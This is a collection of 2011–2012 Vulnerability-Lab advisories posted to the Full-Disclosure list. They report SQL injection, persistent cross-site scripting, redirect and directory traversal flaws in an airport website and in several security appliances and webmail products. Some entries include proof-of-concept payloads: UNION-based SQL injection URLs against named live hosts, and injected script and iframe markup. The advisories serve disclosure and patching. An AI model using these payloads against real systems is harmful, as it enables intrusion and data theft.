Title: == DUS INT Airport - Multiple SQL Injection Vulnerabilities Date: = 2012-01-11 References: === http://www.vulnerability-lab.com/get_content.php?id=173 VL-ID: = 173 Introduction: = Duesseldorf International - Large airports are regional poles for growth all around the world. For the home economy they provide a quick access to the important markets and every metropolis all over the world. They interconnect economic regions and form the basis for business. In many industries the proximity to an airport plays a major role with the decision about the branch also for foreign investors; but it is the entire environment that benefits. Düsseldorf International is the most important airport in Germany s most important economic region. It places ready an infrastructure for the state that opens it up from inside and makes it accessible from outside. (Copy of the Vendor Homepage: http://www.duesseldorf-international.de) Abstract: = An anonymous laboratory researcher discovered multiple (critical/remote) SQL Injection Vulnerabilities on Duesseldorf-international airport Vendor website/portal. Report-Timeline: 2011-04-00: Vendor Notification 2011-**-**: Vendor Response/Feedback 2011-12-01: Vendor Fix/Patch 2012-01-11: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQl-Injection vulnerabilities are detected on the DUS INT Airport Website Services. The remote vulnerability allows an remote attacker to execute own sql commands on the vulnerable value or module. Successful exploitation of the remote SQL Injection vulnerabilities can result in access to all db tables, read server/root passwords, access to sensitive information like customer creditcards/bonuscards, identity-listings, flight-number, schedules, tickets, IDs, packetnumbers, flightfields, pins, ccs, cvs, emails company/business details. Vulnerable Module(s): [+] Fotoarchiv [+] Shoplist [+] Media info Picture(s): ../01.jpg ../02.jpg ../03.jpg Proof of Concept: = The vulnerabilities can be exploited by remote attackers. For demonstration ... Server: www.duesseldorf-international.de Path: /dus/fotos_grafiken/ Files: index.php Para: ?from=fotoarchivfoto_id=28 [sqlinj] Server: www.flughafen-duesseldorf.de Path: /dus/shopliste/ Files: index.php Para: ?back=/besucher/suche=branchebranche_id=1 [blind sqlinj] Server: www.duesseldorf-international.de Path: /dus_en/medieninfo_detail/ Files: index.php Para: ?limit=0recherche=1thema=47id=30 [sqlinj] Reference(s): http://www.duesseldorf-international.de/dus/fotos_grafiken/?from=fotoarchivfoto_id=28 http://www.flughafen-duesseldorf.de/dus/shopliste/?back=/besucher/suche=branchebranche_id=1 http://www.duesseldorf-international.de/dus_en/medieninfo_detail/?limit=0recherche=1thema=47id=30 PoC: http://www.duesseldorf-international.de/dus/fotos_grafiken/?from=fotoarchivfoto_id=28%20union%20all%20select%201,2,3,4-- http://www.flughafen-duesseldorf.de/dus/shopliste/?back=/besucher/suche=branchebranche_id=1%20and%201=2 http://www.duesseldorf-international.de/dus_en/medieninfo_detail/?limit=0recherche=1thema=47id=30 and 1=2 union all select 1,2,@@version,@@version,@@version,6,7,8,9,10,11-- Solution: = 2011-12-01: Vendor - FULL Fix/Patch Risk: = The security risk of the remote sql injection vulnerabilities are estimated as very critical because of the infrastructure behind. Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically
[Full-disclosure] Barracuda SSL VPN 480 - Multiple Web Vulnerabilities
Title: == Barracuda SSL VPN 480 - Multiple Web Vulnerabilities Date: = 2012-01-12 References: === http://www.vulnerability-lab.com/get_content.php?id=35 VL-ID: = 35 Introduction: = The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on. Barracuda SSL VPN * Enables access to corporate intranets, file systems or other Web-based applications * Tracks resource access through auditing and reporting facilities * Scans uploaded files for viruses and malware * Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens * Integrates with existing Active Directory and LDAP directories * Utilizes policies for granular access control framework * Supports any Web browser on PC or Mac (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php) Abstract: = Vulnerability-lab Team discovered multiple persistent Web Vulnerabilities on the Barracudas SSL VPN 480 appliance. Report-Timeline: 2011-04-02: Vendor Notification 2011-05-07: Vendor Response/Feedback 2011-12-18: Vendor Fix/Patch 2012-01-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent Input Validation vulnerabilities are detected on Barracudas SSL VPN 480. Local low privileged user account can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet available servers, manipulated persistent content. Vulnerable Module(s): [+] Create Personal Network Place [+] Network Places 6 Create Network Places [+] SSL Tunnels My Favorites Affected Product(s): [+] Barracuda SSL VPN 480 - Firmware v2.0.1.019 older versions Picture(s): ../ive1.png ../ive2.png Proof of Concept: = The vulnerabilities can be exploited by local low privileged user accounts or remote attackers with via high user inter action. For demonstration or reproduce ... 1. Login 2. Open the vulnerable area were the persistent vulnerability is located 3. Include/Insert your own script code and save the content to inject 4. View the injected results which were stored on application side. The code is getting executed in the listing output section Solution: = 2011-12-18: Vendor Fix/Patch Risk: = The security risk of the persistent vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebTitan Appliance v3.50.x - Multiple Web Vulnerabilities
Title: == WebTitan Appliance v3.50.x - Multiple Web Vulnerabilities Date: = 2012-01-13 References: === http://www.vulnerability-lab.com/get_content.php?id=89 VL-ID: = 89 Introduction: = WebTitan is a complete internet monitoring software (web filter) which provides organisations protection for their data from malware and other internet threats such as viruses, spyware and phishing as well as providing user policy browsing tools to ensure corporate internet policy is adhered to. Feature Set * Includes proxy server and cache * URL Filtering – 53 predefined categories, customizable category creation * Granular policy engine based on users and groups * Content control * Application controls * Includes Anti-virus Protection * Simple download and installation process * Plug and Play solution * Highly Effective web filtering capabilities * ISO and VMware® options * Easy to set up - Up and running in 30 minutes * Web based administrative GUI * Multiple automated reports for entire user activity * Automated updating including URL filters, anti-virus, version releases and system backup * LDAP integration (Copy of the Vendor Website: http://www.webtitan.com/products) Abstract: = Vulnerability Lab Team discovered multiple persistent Input Validation vulnerabilities on the WebTitan Appliance. Report-Timeline: 2011-09-17: Vendor Notification 2012-01-14: Public or Non-Public Disclosure Status: Published Affected Products: == Copperfasten Technologies Product: WebTitan Appliance Application v3.50.x Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected on the Webtitans Application 3.50x. The vulnerability allows privileged user accounts to inject malicious persistent script code to manipulate application requests. Successful exploitation can result in session hijacking, account steal, persistent exploitation persistent context manipulation. Vulnerable Module(s): [+] NTP Server (Display) [+] Extensions / Execute Files [+] Setup Time [+] Categories Add/Edit [+] Add URL Picture(s): ../ive1.png ../ive2.png ../ive3.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... Code Review: NTP Servers tbodytr td colspan=4 align=center bgcolor=#a8a8a8 /td /trtr class=even id=ntpservers_row_1 td width=1% nowrap=nowrap1/tdtd align=left width=100% nowrap=nowrappool.ntp.org/tdtd class=action nowrap=nowrapimg class=imgbutton alt=Delete title=Delete src=imgs/delete.png onclick=nList.updateList('ntpservers', 0, '1', 'pool.ntp.org');/td/trtr classname=even class=even id=ntpservers_row_2td width=1%2/td tdINCLUDE PERSISTENT SCRIPTCODE HERE!/iframe /tdtd classname=action class=actionimg onclick=simpleList.prototype. updateList('ntpservers', 0, '2'); src=imgs/delete.png title=Delete alt=Delete class=imgbutton/td/tr/tbody Code Review: Categories - URL tbodytr id=row_nametd class=dialogLabelCategory name:/td td input classname= class= name=name id=name style=width: 300px; value= type=text /td /trtr id=row_descriptiontd class=dialogLabelDescription:/td td input classname= class= name=description id=description style=width: 300px; value= type=text /td /trtr id=row_urlstd class=dialogLabel valign=topURLs:/td td valign=top table bgcolor=#e8e8e8 cellpadding=0 tbodytr td input classname= class= name=urls_entry style=width: 215px; id=urls_entry type=text /td td input class=button name=urls_button value=Add onclick=urlList.updateList('urls', 1, 'Invalid URL'); style=width: 85px; id=urls_button type=button /td /trtr td colspan=2 style=width: 300px; table class=slist id=urls_table tbodytr td colspan=4 align=center bgcolor=#a8a8a8 /td /tr tr classname=even class=even id=urls_row_1td width=1%1/tdtdINCLUDE PERSISTENT SCRIPTCODE HERE!/tdtd classname=action class=actionimg onclick=simpleList.prototype.updateList('urls', 0, '1'); src=imgs/delete.png title= Delete alt=Delete
[Full-disclosure] ATMAIL WebMail Admin v6.3.4 - Multiple Vulnerabilities
Title: == ATMAIL WebMail Admin v6.3.4 - Multiple Vulnerabilities Date: = 2012-01-07 References: === http://www.vulnerability-lab.com/get_content.php?id=376 VL-ID: = 376 Introduction: = Atmail is a commercial Linux messaging platform provider. The company was founded in 2001 and has its company headquarters located in Peregian Beach, Australia. The company develops webmail, mail-server and groupware solutions built for Linux and other Unix operating systems, and includes the source code under a commercial license. Atmail provides 2 different web based application which are integrated on appliances or different software types. The first service the the ATWebMail Application the secound is the ATWebMail Admin Application. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/@Mail) Abstract: = A Vulnerability-Lab researcher discovered multiple Web Vulnerabilities on the famous ATMAIL Web Admin Application v6.3.4. Report-Timeline: 2012-11-01: Vendor Notification 2012-01-07: Public or Non-Public Disclosure Status: Published Affected Products: == ATMAIL Product: WebMail Admin v6.3.4 Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected on the ATMAIL WebMail Admin Application v6.3.4. The vulnerability allows an remote attacker to inject persistent malicious script code. Successful exploitation can results in persistent content manipulation, server-side session hijacking module context manipulation. Vulnerable Module(s): [+] UserManagement Listing - FirstName or LastName [+] Exception-Handling of the Application - Output [+] Mass-Mail Input Output Listing Picture(s): ../1.1.png ../1.2.png ../2.png Proof of Concept: = The vulnerabilities can be exploited by remote attacker with low required user inter action or by local low privileged user accounts. For demonstration or reproduce ... Code Review: Exception Handling of the Application Service div id=primary_content_inner style=padding: 20px; overflow: auto; height: 100%; ?SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'EXECUTION OF MALICIOUS SCRIPT CODE)' = where'= at= line= 1= h2=Application error/h2 h3Exception information: /h3 p bMessage:br/b SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'iframe src=a onload=alert(PERSISTENT) where' at line 1 /p strongThrown in:/strong /usr/local/atmail/webmail/library/Zend/Db/Statement/Pdo.php, Line #:234, Code #: 42000 h3Stack trace:/h3 pre#0 /usr/local/atmail/webmail/library/Zend/Db/Statement.php(300): Zend_Db_Statement_Pdo-_execute(Array) #1 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(468): Zend_Db_Statement-execute(Array) #2 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Pdo/Abstract.php(238): Zend_Db_Adapter_Abstract-query('select count(id...', Array) #3 /usr/local/atmail/webmail/library/Zend/Db/Adapter/Abstract.php(799): Zend_Db_Adapter_Pdo_Abstract-query('select count(id...', Array) #4/usr/local/atmail/webmail/application/models/api.php(3270): Zend ...... Code Review: Adding New User - Userverwaltung or User Registration tr td class=contact_field align=top Firstname /td td input class= maxlength=128 name=UserFirstName id=UserFirstName value=scriptEXECUTION OF MALICIOUS SCRIPT CODE)/script /td /tr tr td class=contact_field align=top Lastname/td td input class=default maxlength=128 name=UserLastName id=UserLastName value=Last Name /td /tr Code Review: Mass Mail - Output td class=labelFilter by domain:/td td class=filterinput input name=aliasFilter id=aliasFilter class=panelFilter value= scriptEXECUTION OF MALICIOUS SCRIPT CODE)/script type=text smallSpecify a domain or email to filter results/small /td td class=filterdomain /td /tr /tbody/table Reference(s): ../Exception-Handling-PoC.txt ../MassMail-PoC.txt ../NewUSer-Poc.txt Risk: = The
[Full-disclosure] SonicWall AntiSpam EMail Security v7.x - Multiple Web Vulnerabilities
Title: == SonicWall AntiSpam EMail Security v7.x - Multiple Web Vulnerabilities Date: = 2012-01-07 References: === http://www.vulnerability-lab.com/get_content.php?id=58 VL-ID: = 58 Introduction: = Spam-, Phishing- und mit Viren infizierte Nachrichten verursachen in Unternehmen weltweit weiterhin große Schäden. Die Kosten, die durch Produktivitätseinbußen, gestohlene Benutzeridentitäten und den Missbrauch vertraulicher Daten entstehen, können astronomische Höhen erreichen. SonicWALL® Email Security (SES)-Appliances, -Software und -Dienste stellen eine breite Palette an Anti Spam- und E Mail-Sicherheitslösungen bereit, die den Sicherheitsanforderungen von Einzelpersonen und von Unternehmen mit 100.000 Mitarbeitern gleichermaßen gerecht werden. SonicWALL sorgt dafür, dass Sie und Ihr Unternehmen E Mail sicher, produktiv und kosteneffizient nutzen können (Copy of the Vendor Homepage: http://www.sonicwall.com/de/Email_Security.html) Abstract: = Vulnerability-Lab Team discovered multiple Web Vulnerabilities on SonicWalls AntiSpam EMail Security Appliance Application v7.x. Report-Timeline: 2012-01-07: Public or Non-Public Disclosure Status: Published Affected Products: == SonicWall Product: AntiSpam EMail Security Appliance Application v7.3.1 older versions Exploitation-Technique: === Remote Severity: = High Details: 1.1 A persistent input validation vulnerability is detected on SonicWalls AntiSpam EMail Security Appliance Application v7.3.x. Remote attackers or low privileged user accounts can manipulate specific application requests via persistent script code inject low required user inter action. Successful exploitation can result in session hijacking, persistent context manipulation, application side phishing. Vulnerable Module(s): [+] MGMTUser Delegate 1.2 A non-persistent input validation vulnerability is detected on SonicWalls AntiSpam EMail Security Appliance Application. Remote attackers can force via high required user inter action client-side requests to steal session data(cookies). Vulnerable Module(s): [+] MTA Queue Report Picture(s): ../ive1.png 1.3 A redirection vulnerability is detected on SonicWalls AntiSpam EMail Security Appliance Application. The vulnerability allows an attacker to implement a malicious extern website into the panel website. The redirect is exploitable via direction value. Vulnerable Module(s): [+] User Mail View Picture(s): ../redirect.png Affected Version(s): SonicWall AntiSpam EMail Security Appliance Application - v7.3.x or v7.3.4.5725older versions Typus: AntiSpam EMail Security Appliance; Comphresive Box; Unified Threat Management Appliance Proof of Concept: = This vulnerabilities can be exploited by local or remote attackers. For demonstration or reproduce ... 1.1 Code Review(mgmtuser_message.html): Input Validation Vulnerability (Persistent) tr valign=top td valign=middle input type=radio name=dispositionJunk value=tag checked=checked onclick=javascript:document.forms[0].prefixJunk.focus; /tdtd valign=middleTag with input type=text name=prefixJunk size=10 value=iframe src=http://test.de onchange=javascript:document.forms[0].dispositionJunk[2].checked=true; added to the subject/td /tr/tableBR/td/trtr bgcolor=#FFtd valign=topbAction for messages marked as font color=#99Likely Spam/font:/b/td td valign=toptable width=100% border=0 cellspacing=1 cellpadding=1trtd width=15 input type=radio name=dispositionMaybe value=none /tdtdLikely Spam blocking off (deliver messages to recipients)/td/trtrtd input type=radio name=dispositionMaybe value=quarantine/td tdStore in Junk Box and delete after b45 days./b/td/trtr td input type=radio name=dispositionMaybe value=tag checked=checked onclick=javascript:document.forms[0].prefixMaybe.focus; /tdtdTag with input type=text name=prefixMaybe size=10 value=iframe src=http://test.de onchange=javascript:document.forms[0].dispositionMaybe[2].checked=true; added to the subject/td/tr/table Reference(URL): http://xxx.xxx.com/mgmtuser_delegate.htm 1.2 BUG:IVE - Non Persistent URL: http://demo.xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C* BUG:IVE - Persistent URL:http://demo.xxx.com/mgmtuser_delegate.html* Reference(URL): http://xxx.com/reports_mta_queue_status.html?hostname=greenland%22%3E%3C... 1.3 Code Review(msg_viewer_user_mail.html): Redirection Vulnerability form name=msgMessageStoreViewerForm method=post action=/msg_viewer_user_mail.html
[Full-disclosure] ATMAIL WebMail v6.3.4 - Multiple Web Vulnerabilities
Title: == ATMAIL WebMail v6.3.4 - Multiple Web Vulnerabilities Date: = 2012-01-06 References: === http://www.vulnerability-lab.com/get_content.php?id=375 VL-ID: = 375 Introduction: = Atmail is a commercial Linux messaging platform provider. The company was founded in 2001 and has its company headquarters located in Peregian Beach, Australia. The company develops webmail, mail-server and groupware solutions built for Linux and other Unix operating systems, and includes the source code under a commercial license. Atmail provides 2 different web based application which are integrated on appliances or different software types. The first service the the ATWebMail Application the secound is the ATWebMail Admin Application. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/@Mail) Abstract: = A Vulnerability-Lab researcher discovered multiple Web Vulnerabilities on the famous ATMAIL WebMail Application v6.3.4 Report-Timeline: 2012-01-06: Public or Non-Public Disclosure Status: Published Affected Products: == ATMAIL Product: WebMail v6.3.4. Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected on the ATMAIl Web Application v6.3.4. The vulnerability allows an remote attacker to inject persistent malicious script code. Successful exploitation can results in persistent content manipulation, server-side session hijacking module context manipulation. Vulnerable Module(s): [+] EMail - Filter [+] Calender - Event Listing Picture(s): ../1.png ../2.png ../3.png Risk: = The security risk of the persistent web vulnerabilities are estimated as medium(+). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)Ucha Gobejishvili (longrifle0x) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] eFront Enterprise v3.6.10 - File Include Vulnerability
Title: == eFront Enterprise v3.6.10 - File Include Vulnerability Date: = 2012-01-06 References: === http://www.vulnerability-lab.com/get_content.php?id=296 VL-ID: = 296 Introduction: = Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html) Abstract: = A Researcher of the Vulnerability Laboratory Team discovered a remote Directory Traversal vulnerability on the eFronts Enterprise CMS v3.6.10 Report-Timeline: 2011-10-17: Vendor Notification 2011-10-17: Vendor Response/Feedback 2011-11-26: Vendor Fix/Patch 2011-01-06: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = High Details: A remote Directory Traversal vulnerability is detected on eFronts CMS v.3.6.10! The bug allows an remote attacker to request local system files. Successful exploitation of the bug can lead to system or dbms compromise. Vulnerable Module(s): [+] Administration, Trainee Trainer Section Vulnerable File(s): [+] student.php Vulnerable Param(s): [+] ?ctg=personaluser=traineeop=filesdownload= Picture(s): ../1.png Solution: = Restrict the requested content parse the input to patch the issue. UPDATE: 2011/10/26 v3.6.10 build 12151 URL: http://www.efrontlearning.net/download Risk: = The security risk of the Directory Traversal vulnerability is estimated as high(+). Credits: Vulnerability Research Laboratory - Chokri B.A (Meister) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Strato FAQ Center 2012 - Cross Site Scripting Vulnerability
Title: == Strato FAQ Center 2012 - Cross Site Scripting Vulnerability Date: = 2012-01-06 References: === http://www.vulnerability-lab.com/get_content.php?id=372 http://www.vulnerability-lab.com/news/get_news.php?id=68 VL-ID: = 372 Introduction: = FAQ / Login Support Center of the Strato GmbH ... CMS by STRATO AG, Customer-Care IT - Ostendorff (Copy of the Vendor Homepage: http://www.strato.de http://www.strato-faq.de ) Abstract: = A Vulnerability-Lab researcher discovered a non persistent cross site scripting vulnerability in the strato vendor faq center cms 2012. Report-Timeline: 2012-01-03: Vendor Notification 2012-01-04: Vendor Response/Feedback 2012-01-05: Vendor Fix/Patch 2012-01-06: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Medium Details: A non persistent input validation vulnerability has been detected on the strato vendor faq center cms. The vulnerability allows remote attacker to hijack customer sessions with required user inter action click. Successful exploitation can result in client-side content manipulation, client side cross site scripting, session hijacking client side phishing. Vulnerable File(s): [+] Kategories HTML Vulnerable Module(s): [+] Search Result - Input Fields Output Listing Vulnerable Param(s): [+] sessionidsub_kat Picture(s): ../1.png ../2.png ../3.png Solution: = To fix the non persistent cross site vulnerability restrict/parse the input on sub_kat= sessionid. Parse the output listing of the vulnerable implement an exception-handling to prevent against client-side script code executions. Risk: = The security risk of the non persistent cross site scripting vulnerability is estimated as medium(-). Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Astaro Security Gateway v8.1 - Input Validation Vulnerability
Title: == Astaro Security Gateway v8.1 - Input Validation Vulnerability Date: = 2011-12-27 References: === http://www.vulnerability-lab.com/get_content.php?id=193 VL-ID: = 193 Introduction: = Das Astaro Security Gateway 8.101 wurde speziell für den Schutz großer Unternehmen konzipiert. Basierend auf hochwertigen Intel-kompatiblen Serversystemen, einschließlich Dual IntelTM Xeon-Multi-Core-Prozessoren sowie redundanten Highspeed-Festplatten, bietet es selbst für die herausforderndsten Umgebungen optimale Performance und Zuverlässigkeit. Dieser Abschnitt beschreibt detailliert die verfügbaren Sicherheitsanwendungen, technischen Einzelheiten und Einsatzszenarien. (Copy of the Vendor Homepage: https://www.astaro.com/de-de/produkte/hardware-appliance/astaro-security-gateway-625) Abstract: = Vulnerability-Lab Team discovered a persistent Cross Site Scripting issue on Astaro Security Gateway. Report-Timeline: 2011-12-27: Public or Non-Public Disclosure Status: Published Affected Products: == Astaro Security Gateway v8.1 Exploitation-Technique: === Remote Severity: = Medium Details: A persistent cross site scripting vulnerability is detected on Astaro Security Gateway v8.101. The vulnerability allows an privileged user account to implement malicious persistent script code. The bug is located in the preview function of the certificate delete popup box. Vulnerable Module(s): [+] Certificate - Delete Preview Popup Box Pictures: ../1.png Proof of Concept: = The vulnerability can be exploited by remote attackers or privileged restricted user accounts. For demonstration or reproduce ... Site-2-Site VPN - Certificate Management Preview div style=left: 300px; top: 220px; z-index: 2000; visibility: visible; class=iPopUp id=iPopup_2div class=iPopUpTitlePlease confirm:/divdiv class=iPopUpTextp#8203;#8203;#8203;#8203;#8203;Are you sure that you want to delete the X509 certificate with private key object 'INCLUDED PERSISTENT SCRIPTCODE HERE!!!'?/p/iframe/p/divtable border=0 cellpadding=0 cellspacing=0tbodytrtd style=padding: 2px;div id=btnDefault_iPopup_2 class=button style=width: auto; cursor: pointer; color: black; font-weight: bold;div class=button_left/divdiv class=button_center style=width: auto;span style=font-weight: normal;OK/span/divdiv class=button_right/div/div/td#8203;#8203;#8203;#8203;#8203;td style=padding: 2px;div class=button style=width: auto; cursor: pointer; color: black;div class=button_left/divdiv class=button_center style=width: auto;span style=font-weight: normal;Cancel/span/divdiv class=button_right/div/div/td/tr/tbody/table/div ../index.dat Risk: = The security risk of the persistent vulnerability is estimated as medium. Credits: Vulnerability Research Laboratory Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Barracuda Control Center 620 - Multiple Web Vulnerabilities
Title: == Barracuda Control Center 620 - Multiple Web Vulnerabilities Date: = 2011-12-21 References: === http://www.vulnerability-lab.com/get_content.php?id=32 VL-ID: = 32 Introduction: = Barracuda Networks - Worldwide leader in email and Web security. Control Center Application of Barracuda Networks (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/) Abstract: = Vulnerability-lab Team discovered multiple Web Vulnerabilities on Barracuda Control Center 620 appliance/application. Report-Timeline: 2011-06-03: Vendor Notification 2011-07-12: Vendor Response/Feedback 2011-11-26: Vendor Fix/Patch 2011-12-21: Public or Non-Public Disclosure Status: Published Affected Products: == Barracuda Control Center 620 Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 Multiple persistent Input Validation vulnerabilities are detected on Barracudas Control Center 620. Local low privileged user account can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet available servers, manipulated persistent content. Vulnerable Module(s): (Persistent) [+] authdblookup -input 1.2 Multiple non-persistent Input Validation vulnerabilities are detected on Barracudas Control Center 620 appliance. Attackers can form malicious client-side requests to hijack customer/admin sessions. Successful exploitation requires user inter action can lead to information disclosure, session hijacking and access to servers in the intranet. Vulnerable Module(s): (Non-Persistent) [+] editdevices [+] main Picture(s): ../control1.png ../control2.png ../control3.png Proof of Concept: = The vulnerabilities can be exploited by low privileged user accounts or remote attacker via high required user inter action. For demonstration or reproduce ... 1.1 Persistent https://127.0.0.1:8080/bcc/authdblookup-input.jsp?selected-user=gu...@barracuda.comselected-node= Manually reproduce ... 1. Login 2. Switch to the vulnerable authdblookup-input.jsp add mask 3. Include your own malicious persistent script code (java-script or html) save the input 4. The stored script code will be executed in main-bar as stable output result (persistent) 1.2 Non-Persistent https://127.0.0.1:8080/bcc/editdevices.jsp?device-type=spywareselected-node=1containerid=[IVE] https://127.0.0.1:8080/bcc/main.jsp?device-type=[IVE] Solution: = Barracuda implemented after the issues 2011 a validation mask to filter malicious disallowed inputs. The barracuda firmware of the filter has been update multiple times. Risk: = 1.1 The security risk of the discovered persistent vulnerabilities are estimated as medium(+) because of low required user inter action. 1.2 The security risk of the discovered non-persistent vulnerabilities are estimated as low because of high required user inter action. Credits: Vulnerability Research Laboratory - Pim J.F. Campers (X4lt) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and 